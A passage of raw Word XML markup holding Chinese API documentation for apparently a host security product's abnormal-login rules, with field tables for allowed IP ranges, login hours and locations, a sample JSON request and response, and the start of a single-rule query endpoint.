            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE54802" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51ECCF65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BF9718A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B858444" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C2FE2F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04231BC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP类型，1：普通IP/CIDR 2：IP段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C30E5EB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04DD4171" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3724472C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05CB2287" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF849B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55632FB4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AF14C8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startStr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56129171" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21627C30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A42F2A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP段起始</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1089F2A7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5929FA16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>endStr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6BF4D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9C7D39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="407CD87C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP段结束</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="172EAFD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>loginTimeInfo数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="813"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3416"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="16D2468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51C5CEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C2645DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43533808" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A995156" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BE5A6E5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE98829" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="691946D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09BE8311" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB6CD0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始时间，如14：00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50471D4D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74406F23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66F48AA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E77E2BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68423DBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束时间，如18：20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="139818C1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="533C022A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="402BF460" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="714AEF06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C0A573" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>周期(周一到周日)，如[1,2,3,4,5,6,0]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CFA4DC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>loginLocationInfo数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4153"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4CC292E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9867E78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77AE9DC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E6DEFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34055CB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A032371" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F8B6726" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02010542" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C337064" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6BAE1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>国家</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64E9A407" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55737387" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>province</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4923D4D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EA90AED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36152999" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>省（当国家为中国以外时，该参数无需传入）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4341095C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72468B63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>city</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175E55EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1912E314" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="049E2D6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>市（当国家为中国以外时，该参数无需传入）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3110DDB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15D63E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [22,33],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"agentIds": [“4735a8101f2847c6”,”b439d8a7f96e37d7”],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"loginIpInfo": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ip": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "startStr": "192.168.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "endStr": "192.168.0.10"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "loginTimeInfo": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "start": "09:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "end": "21:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "weeks": [1, 2, 3, 4, 5]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "loginLocationInfo": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "country": "中国",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "province": "湖北省",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "city": "武汉市"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C90DE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4326F052" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE435E"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497C54" w14:paraId="055BC63B"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4CB553A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77915102" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CDDA9BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EC5CD23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C9D676E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD08B7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5784343E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05D515B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AAE5270" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D95D182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="查询单条规则-1"/>
      <w:bookmarkEnd w:id="142"/>
      <w:r>
        <w:t>查询单条规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27934D75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录单条规则的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F4444" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAB879" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/abnormallogin/{linux,win}/rule/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43D6A5"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630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5A86C74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48E45DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="611B2BE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6FA64A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="584B4444" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60CBD7AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F98FD09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B302C38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="721D3430" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6567F917" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="071DC60B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
